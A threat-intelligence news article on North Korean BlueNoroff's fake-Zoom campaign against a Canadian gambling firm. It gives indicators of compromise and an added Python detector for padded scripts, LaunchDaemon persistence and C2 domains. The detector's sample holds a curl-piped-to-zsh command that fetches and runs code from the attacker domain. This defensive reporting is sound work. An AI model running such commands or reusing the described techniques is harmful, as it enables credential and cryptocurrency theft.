BlueNoroff Hackers Exploit Zoom App to Deploy Infostealer Malware in Targeted Attacks
The Field Effect Analysis team has uncovered a targeted social engineering campaign orchestrated by the North Korean state-sponsored threat actor BlueNoroff, a financially motivated subgroup of the notorious Lazarus Group.
A Canadian online gambling provider fell victim to a meticulously crafted attack involving impersonation of a trusted contact and the Zoom platform.
Sophisticated Social Engineering Campaign
The attacker leveraged a spoofed domain, zoom-tech[.]us, to deceive the victim during a scheduled cryptocurrency-related Zoom meeting.
By exploiting audio issues as a pretext, the threat actor coerced the victim into running a malicious script disguised as a Zoom audio repair tool.

According to the report, this script, laced with hidden commands among 10,000 blank lines, initiated a chain of events that downloaded infostealer malware, ultimately compromising sensitive data including user credentials and browser profiles.
The infection chain employed by BlueNoroff showcases a blend of technical finesse and psychological manipulation.
The initial script redirected the victim to the fraudulent domain zoom-tech[.]us, registered on April 14, 2025, using deceptive WHOIS data tied to multiple similar domains.
Malware Deployment
Once executed, the script invoked shell commands via curl and zsh to download secondary payloads, including a credential-harvesting component that exfiltrated the victim’s local account password.
Subsequent stages involved deploying a persistent malware implant via a LaunchDaemon configuration, ensuring boot-time execution with elevated privileges.
The malware, masquerading as legitimate macOS components like “Wi-Fi Updater,” featured process injection capabilities through specific entitlements, allowing it to attach to other processes.
Data-stealing routines were executed in parallel, rapidly collecting and exfiltrating keychain files, browser data (focusing on cryptocurrency wallet extensions in browsers like Brave), and system reconnaissance outputs using tools like rsync and curl.
The use of temporary directories and anti-forensic techniques, such as file deletion post-execution, minimized the attacker’s footprint, while domains like ajayplamingo[.]com and zmwebsdk[.]com facilitated command-and-control (C2) and data egress.
The campaign, traced back to at least March 2025, reflects BlueNoroff’s evolving tradecraft, targeting the cryptocurrency ecosystem with a focus on financial gain across regions like North America, South Korea, Japan, and Europe.
Organizations are urged to monitor for these indicators, restrict unauthorized script execution, and educate users on social engineering tactics to counter such advanced threats.
Indicators of Compromise (IoCs)
| Type | Indicator | Details |
|---|---|---|
| Binary | /Library/RestoreKey/com.apple.siri.updater | SHA256: 036CA0A9D6A87E811F96F3AAADD8D0506954716CDB3B56915FC20859F1363C2F |
| Binary | /Users//Library/com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater | SHA256: CCF7F7678965105142F6878D7B1F1F1C6F31FDBC45B0E50B8E70D0441F0B7472 |
| C2 Domain | zoom-tech[.]us | Used for initial payload delivery and data exfiltration |
| C2 Domain | ajayplamingo[.]com | Used for malware implant C2 communication |
| C2 Domain | zmwebsdk[.]com | Used for data exfiltration |
| IP Address | 23.254.203[.]244 | Associated with C2 communications |
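As an added defensive example (not code from the Field Effect report), the following Python checks host artefacts against the indicators in this table: it flags scripts padded with blank lines like the fake audio-repair tool, LaunchDaemon plists that launch either listed binary, and the listed domains appearing in scripts or logs. The blank-line threshold and the sample inputs are constructed assumptions, not artefacts from the report.

```python
import plistlib

# Indicators from this page's IoC table. The user name in the second path is
# elided in the source, so we match on the trailing path components instead.
KNOWN_BAD_PROGRAMS = (
    "/Library/RestoreKey/com.apple.siri.updater",
    "com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater",
)
KNOWN_BAD_DOMAINS = ("zoom-tech.us", "ajayplamingo.com", "zmwebsdk.com")


def padded_script(text, min_blank=1000):
    """Flag a script that hides a few real commands inside a long run of blank
    lines (the report describes 10,000). Returns (flagged, blank_count, commands).
    The 1000-line threshold is an assumed tuning value."""
    lines = text.splitlines()
    commands = [line for line in lines if line.strip()]
    blank = len(lines) - len(commands)
    return blank >= min_blank and len(commands) > 0, blank, commands


def launchdaemon_hits(plist_bytes):
    """Return known-bad program paths that a launchd plist would execute
    (Program or ProgramArguments), which is how the implant gained persistence."""
    job = plistlib.loads(plist_bytes)
    candidates = [job.get("Program", "")] + list(job.get("ProgramArguments", []))
    return [c for c in candidates if any(c.endswith(bad) for bad in KNOWN_BAD_PROGRAMS)]


def domain_hits(text):
    """Return page-listed C2 domains found in a script or log line,
    whether written plainly or de-fanged with [.]."""
    flat = text.replace("[.]", ".")
    return [d for d in KNOWN_BAD_DOMAINS if d in flat]


# Constructed samples for demonstration, mirroring the described chain
# (zsh script padded with blank lines; launchd job running the listed binary).
SAMPLE_SCRIPT = "#!/bin/zsh\n" + "\n" * 10000 + "curl -s https://zoom-tech.us/ | zsh\n"
SAMPLE_PLIST = plistlib.dumps({
    "Label": "com.apple.siri.updater",
    "RunAtLoad": True,
    "ProgramArguments": ["/Library/RestoreKey/com.apple.siri.updater"],
})

if __name__ == "__main__":
    print(padded_script(SAMPLE_SCRIPT)[:2])   # (True, 10000)
    print(launchdaemon_hits(SAMPLE_PLIST))     # ['/Library/RestoreKey/com.apple.siri.updater']
    print(domain_hits("GET https://zmwebsdk[.]com/"))  # ['zmwebsdk.com']
```

On a live host the plist check would be run over every file in /Library/LaunchDaemons and ~/Library/LaunchAgents, and padded_script over any recently downloaded shell script.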